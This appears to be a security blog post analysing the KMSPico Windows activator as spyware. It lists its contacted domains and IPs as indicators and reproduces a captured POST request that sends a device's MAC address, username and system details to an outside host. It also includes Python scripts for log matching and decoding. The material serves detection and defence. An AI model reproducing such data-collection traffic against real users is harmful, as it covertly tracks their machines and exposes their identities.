Spyware: Beware of the KMSPico activator tool, which is used to make Windows appear legitimately activated

The well-known KMSPico activator tool has been classified as a malicious binary: while activating the Windows environment in which it is run, the tool contacts 8 domains and 14 hosts.


The hosts and IP addresses contacted are shown below:

Host                        IP address         Country
cdn2.downloadcrest.com      54.230.35.82       United States
installer.ppdownload.com    54.243.101.184     United States
static.revenyou.com         198.232.124.224    United States
srv.dmdataserver.com        107.21.247.138     United States
stats.g.doubleclick.net     64.233.191.154     United States
www.keenondownload.com      54.221.208.116     United States
i1088.photobucket.com       192.229.163.16     United States
cdn1.downloadcrest.com      54.230.35.14       United States
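As an added example (not part of the original post), the following Python script turns the table above into a simple indicator match over proxy-log lines. The log format is a constructed one ("timestamp client method url destination-ip status") and the sample lines are constructed, not real traffic; the domain and IP sets are copied from the table.

```python
"""Match proxy-log lines against the KMSPico hosts and IPs listed above.

Added example (not from the original post). The log format is constructed:
"<timestamp> <client_ip> <method> <url> <dest_ip> <status>".
"""
from urllib.parse import urlsplit

# Indicators copied from the table in the post.
KMSPICO_DOMAINS = frozenset({
    "cdn2.downloadcrest.com", "installer.ppdownload.com", "static.revenyou.com",
    "srv.dmdataserver.com", "stats.g.doubleclick.net", "www.keenondownload.com",
    "i1088.photobucket.com", "cdn1.downloadcrest.com",
})
KMSPICO_IPS = frozenset({
    "54.230.35.82", "54.243.101.184", "198.232.124.224", "107.21.247.138",
    "64.233.191.154", "54.221.208.116", "192.229.163.16", "54.230.35.14",
})

# Constructed sample log (not real traffic): two domain hits, one benign line,
# and one line whose destination IP matches but whose hostname does not.
SAMPLE_LOG = """\
2015-08-03T17:51:20Z 10.0.0.5 POST http://www.keenondownload.com/index.php 54.221.208.116 200
2015-08-03T17:51:22Z 10.0.0.5 GET http://cdn2.downloadcrest.com/setup.bin 54.230.35.82 200
2015-08-03T17:52:01Z 10.0.0.7 GET https://www.example.com/ 198.51.100.20 200
2015-08-03T17:52:09Z 10.0.0.5 GET http://cdn.example.invalid/file 54.230.35.14 200
"""


def parse_line(line):
    """Split one constructed log line into its six fields; None if malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, client, method, url, dst_ip, status = parts
    host = urlsplit(url).hostname or ""
    return {"ts": ts, "client": client, "method": method,
            "host": host.lower(), "dst_ip": dst_ip, "status": status}


def scan_log(text):
    """Return one hit per matching line, recording which indicator matched.

    A domain match is the strong signal. An IP-only match is reported
    separately because these addresses sit in shared cloud/CDN ranges and
    are reused by unrelated services.
    """
    hits = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        rec = parse_line(raw)
        if rec is None:
            continue
        matched = []
        if rec["host"] in KMSPICO_DOMAINS:
            matched.append("domain")
        if rec["dst_ip"] in KMSPICO_IPS:
            matched.append("ip")
        if matched:
            hits.append({"line": lineno, "client": rec["client"],
                         "host": rec["host"], "dst_ip": rec["dst_ip"],
                         "matched_on": matched})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

When using this list in practice, treat the domain as the durable indicator and the IP as corroboration only: the download-CDN addresses rotate, and entries such as stats.g.doubleclick.net and i1088.photobucket.com are shared third-party services that will also appear in ordinary browsing, so matching them alone produces noise.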

KMSPico mainly communicates over ports 80 and 443.

Looking at the POST traffic that is generated, we can see that information is sent to keenondownload.com, including the MAC address of the device and some type of username.

POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Host: www.keenondownload.com
Content-Length: 554
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.4926SP1&Net4=4.5.51641&OSversion=NT6.3SP0&Slv=&Sysid=55BE2B545C3C71DACD1ECD50DFED0C73&Sysid1=D82EEA89B81AB3DAB442A4B1607BD260&X64=N&admin=Y&browser=FirefoxURL&cavp=%22Windows+Defender%22%3B&chver=&cmdl=KMSPico10.0.9__8173_il94690.exe&dprod=A21CC102FC6D2E696FC836585B7A35&dprod4=77B342BD3BBE5C1FF30221EF5C6FD7&exe=KMSPico10.0.9__8173_il94690&ffver=36.0.1.5542&lang_DfltUser=0409&mac=MEEwMDI3MjlDQjdEMDAwMAA%3D&machg=ZGIwMmNiMmEtYjkzYS00YjA3LWE5OWEtZTBlZmMxM2RiYjY4AA%3D%3D&name=YjlhUjVDenZ6awA%3D&netfs=-1&ts=1438624280&ver=1.1.5.26
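As an added example (not part of the original post), the Python script below parses the captured body and decodes the fields that are not sent in the clear. The body string is copied from the request above. The post only identifies mac as the MAC address and name as some kind of username; the reading of the other fields (machg as a GUID-shaped machine identifier, cavp as the installed antivirus, the trailing "0000" on the MAC value as padding) is an assumption based on the decoded shape of each value, not something the post states.

```python
"""Decode the fields of the captured KMSPico POST body.

Added example (not from the original post). Field interpretations beyond
mac = MAC address and name = username are assumptions based on the
decoded shape of each value.
"""
import base64
from datetime import datetime, timezone
from urllib.parse import parse_qs

# Copied verbatim from the captured request above (split across lines only).
CAPTURED_BODY = (
    "Net1.1=&Net2=3.5.30729.4926SP1&Net4=4.5.51641&OSversion=NT6.3SP0&Slv="
    "&Sysid=55BE2B545C3C71DACD1ECD50DFED0C73&Sysid1=D82EEA89B81AB3DAB442A4B1607BD260"
    "&X64=N&admin=Y&browser=FirefoxURL&cavp=%22Windows+Defender%22%3B&chver="
    "&cmdl=KMSPico10.0.9__8173_il94690.exe&dprod=A21CC102FC6D2E696FC836585B7A35"
    "&dprod4=77B342BD3BBE5C1FF30221EF5C6FD7&exe=KMSPico10.0.9__8173_il94690"
    "&ffver=36.0.1.5542&lang_DfltUser=0409&mac=MEEwMDI3MjlDQjdEMDAwMAA%3D"
    "&machg=ZGIwMmNiMmEtYjkzYS00YjA3LWE5OWEtZTBlZmMxM2RiYjY4AA%3D%3D"
    "&name=YjlhUjVDenZ6awA%3D&netfs=-1&ts=1438624280&ver=1.1.5.26"
)


def decode_b64(value):
    """Base64-decode one field and drop the trailing NUL the client appends."""
    return base64.b64decode(value).rstrip(b"\x00").decode("ascii", errors="replace")


def format_mac(raw_hex):
    """Render the first 12 hex digits as a colon-separated MAC.

    Assumption: the trailing "0000" in the decoded value is padding.
    """
    mac = raw_hex[:12]
    return ":".join(mac[i:i + 2] for i in range(0, 12, 2))


def decode_body(body):
    """Parse the URL-encoded body and decode the base64 fields."""
    # keep_blank_values so empty fields such as Net1.1= and Slv= are retained.
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    raw_mac = decode_b64(fields["mac"])
    return {
        "binary": fields["cmdl"],
        "os_version": fields["OSversion"],
        "is_admin": fields["admin"] == "Y",
        "antivirus": fields["cavp"],            # assumed: installed AV product
        "mac_raw": raw_mac,
        "mac": format_mac(raw_mac),
        "machg": decode_b64(fields["machg"]),   # GUID-shaped; assumed machine identifier
        "name": decode_b64(fields["name"]),     # the "username" the post refers to
        "sent_at": datetime.fromtimestamp(int(fields["ts"]), tz=timezone.utc).isoformat(),
        "system_ids": (fields["Sysid"], fields["Sysid1"]),
        "all_fields": sorted(fields),
    }


if __name__ == "__main__":
    for key, value in decode_body(CAPTURED_BODY).items():
        print(f"{key}: {value}")
```

The decoded output is what matters for assessing the telemetry: a hardware address, a persistent GUID-shaped identifier, a username, the installed antivirus, admin status and the exact binary name are enough to track a machine across runs, which is why this traffic is treated as spyware rather than an innocuous update check.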

You can read the full report on the KMSPico application here.